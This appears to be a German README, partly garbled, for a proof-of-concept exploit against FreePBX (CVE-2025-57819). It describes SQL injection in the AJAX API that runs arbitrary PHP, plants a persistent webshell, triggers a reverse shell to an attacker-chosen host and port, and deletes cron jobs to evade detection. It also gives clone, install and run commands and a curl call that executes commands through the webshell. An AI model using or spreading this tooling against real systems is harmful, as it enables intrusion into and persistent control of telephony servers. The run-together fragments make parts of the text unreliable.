
Proof-of-concept-Exploit für CVE-2025-57819 in FreePBX: SQL-Injection in der AJAX-API, um beliebigen PHP-Code auszuführen, eine persistente Webshell zu erstellen und eine Reverse-Shell auszulösen.
Dieses Skript nutzt eine Schwachstelle in FreePBX-Versionen vor 16.0.26.0 (CVE-2025-57819) aus, die es entfernten Angreifern ermöglicht, beliebigen PHP-Code über eine SQL-Injection-Schwachstelle im AJAX-API-Endpunkt auszuführen. Der Exploit erstellt sowohl eine Webshell als auch eine automatisch ausgelöste Reverse Shell.
/admin/ajax.php)/pbxshell.phprequests-Bibliothekgit clone https://github.com/jasonbernier/CVE-2025-5781.git
cd CVE-2025-5781
pip install requests
python3 exploit.py -H TARGET_HOST -lhost LHOST -lport LPORT
-H HOST: Ziel-FreePBX-Instanz (z. B. https://freepbx.example.com)-lhost LHOST: Ihre IP für den Reverse-Shell-Callback-lport LPORT: Port für die Reverse-Shell-Verbindungpython3 exploit.py -H https://target.freepbx.com -lhost 10.0.0.1 -lport 4444
Nach erfolgreicher Ausnutzung greifen Sie wie folgt auf die Webshell zu:
curl -X GET "http://TARGET/pbxshell.php?cmd=id"
Der Exploit entfernt nach der Ausführung automatisch Cron-Jobs, um eine Erkennung zu vermeiden.
--, um die verbleibende SQL-Syntax auszukommentieren/var/www/html/